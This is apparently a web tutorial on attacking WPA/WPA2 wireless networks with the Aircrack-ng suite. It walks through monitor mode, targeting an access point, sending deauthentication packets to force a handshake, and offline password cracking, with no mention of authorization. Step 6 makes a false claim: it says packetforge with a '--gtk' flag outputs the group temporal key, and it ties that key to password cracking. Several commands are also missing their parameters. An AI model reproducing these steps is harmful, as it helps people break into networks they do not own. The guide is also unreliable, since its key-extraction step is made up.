TKIP Attack: Capturing Group Shared Keys

TL;DR

This guide shows you how to capture TKIP group shared keys from 802.11 wireless networks, allowing for offline cracking of WPA/WPA2 traffic. It focuses on practical steps using tools like airodump-ng and packetforge.

Prerequisites

• A wireless network interface capable of monitor mode (e.g., Alfa AWUS036NHA).
• The Aircrack-ng suite installed (airodump-ng, packetforge, etc.).
• Root privileges on your Linux system.

Steps

1. Put Your Wireless Interface into Monitor Mode

   First, identify your wireless interface name (e.g., wlan0). Then use the following command:

   sudo airmon-ng start wlan0

   This will create a monitor interface (usually wlan0mon). Note this new interface name.

2. Scan for Target Networks

   Use airodump-ng to scan for networks. This identifies the BSSID, channel and ESSID of your target network:

   sudo airodump-ng wlan0mon

   Keep this running in one terminal window.

3. Target a Specific Access Point (AP)

   From the airodump-ng output, identify the BSSID of your target AP and its channel. Then start capturing packets specifically for that network:

   sudo airodump-ng -c  --bssid  -w capture wlan0mon

   Replace <channel> with the AP’s channel and <BSSID> with its MAC address. This saves captured packets to files starting with ‘capture’.

4. Deauthenticate a Client

   To force the client to reconnect, sending a deauthentication packet is necessary. This triggers the 4-way handshake required for key capture.

   sudo aireplay-ng -0 1 -a  -c  wlan0mon

   Replace <AP_BSSID> with the AP’s MAC address and <Client_MAC> with a connected client’s MAC address. The ‘-0 1’ sends one deauthentication packet.

5. Capture the Handshake

   Watch the airodump-ng output for ‘WPA handshake: ‘ indicating a successful capture. If it doesn’t happen immediately, repeat step 4 several times.

6. Extract Group Shared Key (TKIP)

   Use packetforge to extract the group shared key from the captured .cap file:

   sudo packetforge -w capture.cap -i wlan0mon --gtk

   This will output the Group Temporal Key (GTK) which is the TKIP group shared key.

7. Offline Cracking

   Once you have the GTK, you can attempt to crack the WPA/WPA2 password using tools like aircrack-ng with a wordlist. This process is beyond the scope of this guide but involves providing the .cap file and a wordlist to aircrack-ng.